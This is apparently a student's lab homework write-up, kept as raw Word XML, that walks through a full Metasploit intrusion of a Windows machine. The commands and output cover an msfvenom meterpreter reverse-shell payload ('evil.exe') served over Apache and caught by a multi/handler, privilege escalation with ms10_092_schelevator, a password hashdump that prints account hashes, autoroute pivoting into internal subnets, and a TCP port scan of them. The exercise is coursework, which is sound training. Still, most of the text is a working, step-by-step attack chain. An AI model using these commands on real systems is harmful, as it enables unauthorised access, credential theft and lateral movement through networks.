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FDD2E" w14:textId="0F614127" w:rsidR="005F5E21" w:rsidRDefault="005439E5">
      <w:r>
        <w:t>Homework 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E50994" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="27AD1A68" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Rajat Vij</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DABEA2" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="00D015D6" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Step 1. Created a payload using msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC28A5D" w14:textId="77777777" w:rsidR="00247D8F" w:rsidRDefault="00247D8F"/>
    <w:p w14:paraId="6B42DA3D" w14:textId="38FAF390" w:rsidR="00247D8F" w:rsidRDefault="00247D8F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00247D8F">
        <w:t>msfvenom -a x86 --platform windows -p windows/meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="00FC5E2F">
        <w:t>/reverse_tcp LHOST=172.17.17.116</w:t>
      </w:r>
      <w:r w:rsidRPr="00247D8F">
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidR="00FC5E2F">
        <w:t>PORT=31337 -f exe -o /tmp/evil</w:t>
      </w:r>
      <w:r w:rsidRPr="00247D8F">
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654DF282" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E26312" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="0CFF8974" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Step 2. Started apache server and copied the payload in /var/www/html/ folder with 755 permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65555C0F" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B99CE5" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cp /tmp/evil</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5E2F">
        <w:t xml:space="preserve">.exe /var/www/html/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4B0D1" w14:textId="41DEB481" w:rsidR="00FC5E2F" w:rsidRDefault="00435920" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>chmod 755 /var/www/html/evil</w:t>
      </w:r>
      <w:r w:rsidR="00FC5E2F" w:rsidRPr="00FC5E2F">
        <w:t xml:space="preserve">.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087E0368" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F"/>
    <w:p w14:paraId="4248D2E6" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="7ECF9E63" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Step 3. In Windows, downloaded payload using ip address of kali box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C02189" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F"/>
    <w:p w14:paraId="1AD355EB" w14:textId="0E5EB920" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F">
      <w:r>
        <w:t>Use url 172.17.17.116/evil.exe in internet explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC3E30" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="50EAABF3" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Step 4. In kali box, Started multi handler exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A154E6E" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRPr="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5E2F">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B14EE" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRPr="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5E2F">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3733E3" w14:textId="49501938" w:rsidR="00FC5E2F" w:rsidRPr="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5E2F">
        <w:t>set LHOST 172.17.17.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C56C1E" w14:textId="77777777" w:rsidR="00FC5E2F" w:rsidRPr="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5E2F">
        <w:t>set LPORT 31337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F0C3FC" w14:textId="7BD18C1E" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D37480" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="2C292991" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Step 5. Ran Payload in Windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F95735" w14:textId="2A7CDAE2" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run evil.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C7C10" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="3FA04A3A" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Step 6. Got into meterpreter. Check various information regarding windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A427023" w14:textId="2907909C" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Migrate to x64 process</w:t>
      </w:r>
      <w:r w:rsidR="00435920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F65906" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920" w:rsidP="00435920"/>
    <w:p w14:paraId="688BD57E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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; migrate 488</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A20F5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Migrating from 1032 to 488...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240761A" w14:textId="691F3D34" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr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Migration completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C79CD" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="27E96213" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t xml:space="preserve">Step 7. Background the meterpreter and used background session with </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE189E">
        <w:t>exploit/windows/local/ms10_092_schelevator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to get system privillages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8FFFA4" w14:textId="1B211E7D" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E1E18D" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920" w:rsidP="00435920"/>
    <w:p w14:paraId="1B3FE3F1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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1847CC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Obtaining the boot key...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787669B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Calculating the hboot key using SYSKEY 45472cffc524810b845629ca812556c0...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107807C7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Obtaining the user list and keys...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF0AFF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Decrypting user keys...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5D133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lastRenderedPageBreak/>
        <w:t>[*]</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dumping password hints...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67974EF7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32BD57D6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user2:"P@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF7B1F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2C830797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Dumping password hashes...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6EF97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1FE2557D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48F669E3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Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3048FC43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Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B026529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user2:1000:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BEACD" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D73C923" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EF96CF" w14:textId="63FABAEC" w:rsidR="00FC5E2F" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00FC5E2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435920">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Check the shared drive on shell. Ping the smb-server to get smb-server’s ipaddress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF82E90" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCD86BF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46B749B1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C:\Windows\system32&gt;net use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092F255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net use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206750FE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New connections will be remembered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369AD6E6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6D33047D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59402A24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Status       Local     Remote                    Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D954D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717565DD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-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1C6A5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Unavailable  Z:        \\smb-server\filestore    Microsoft Windows Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE8F6A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The command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280A33FD" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4290CFCA" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB60C39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ping smb-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FFD9BA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ping smb-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36506114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44A9120F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Pinging smb-server.widget-corp.tiwaz.net [10.10.94.20] with 32 bytes of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526A277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Reply from 10.10.94.20: bytes=32 time&lt;1ms TTL=127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563380FA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Reply from 10.10.94.20: bytes=32 time&lt;1ms TTL=127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E7D72E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Reply from 10.10.94.20: bytes=32 time&lt;1ms TTL=127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2936C9D1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Reply from 10.10.94.20: bytes=32 time&lt;1ms TTL=127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9230E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4BF2988B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Ping statistics for 10.10.94.20:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2D8C6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 xml:space="preserve">    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D2FA53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Approximate round trip times in milli-seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA0631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 xml:space="preserve">    Minimum = 0ms, Maximum = 0ms, Average = 0ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48806301" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920" w:rsidP="00435920"/>
    <w:p w14:paraId="3F643A03" w14:textId="7521C316" w:rsidR="00DE189E" w:rsidRDefault="0021780C">
      <w:r>
        <w:t>Now we know that there is another network(10.10.94.0/24) available to us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64E933" w14:textId="77777777" w:rsidR="0021780C" w:rsidRDefault="0021780C"/>
    <w:p w14:paraId="03125E09" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E">
      <w:r>
        <w:t>Step 8. Ran autoroute for both 10.10.93.0/24 and 192.168.93.0/24 network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C3695" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920"/>
    <w:p w14:paraId="522456A9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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run autoroute -s 10.10.93.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571D65FD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Adding a route to 10.10.93.0/255.255.255.0...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE7786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2FB41D"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Added route to 10.10.93.0/255.255.255.0 via 10.10.93.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C16A2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Use the -p option to list all active routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D4594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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run autoroute -s 10.10.94.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B031B00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Adding a route to 10.10.94.0/255.255.255.0...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FBFD7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2FB41D"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Added route to 10.10.94.0/255.255.255.0 via 10.10.93.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF8A39" w14:textId="77777777" w:rsid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Use the -p option to list all active routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136AF1E" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920"/>
    <w:p w14:paraId="4DC694EF" w14:textId="4B4CF7CD" w:rsidR="00435920" w:rsidRDefault="00435920">
      <w:r>
        <w:t>Step 9. Ran TCP port scan for both 10.10.93.0/24 and 10.10.94.0/24 network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D413D51" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920"/>
    <w:p w14:paraId="79A12A9B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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ms10_092_schelevator</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC62D0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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set PORTS 139,445,80,25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25978B9F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PORTS =&gt; 139,445,80,25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4263B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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.93.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB8C9D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RHOSTS =&gt; 10.10.93.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DE1B15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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set THREADS 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C1C960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THREADS =&gt; 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59574310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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set TIMEOUT 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B498D4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TIMEOUT =&gt; 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257B297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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B1FD3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5DB0BABE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10.10.93.1:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8E3BD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10.10.93.15:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A45A5E5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10.10.93.1:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA3309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Scanned  50 of 256 hosts (19% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584A8DF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Scanned  68 of 256 hosts (26% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F7396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Scanned  83 of 256 hosts (32% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C123601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10.10.93.102:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AEAF97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10.10.93.104:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7592E4A1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10.10.93.100:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F59FE35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10.10.93.104:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A0BB2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10.10.93.100:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FA0B4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10.10.93.101:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3364E897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10.10.93.103:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BC278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10.10.93.103:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA058BA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10.10.93.102:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7896F6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10.10.93.105:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
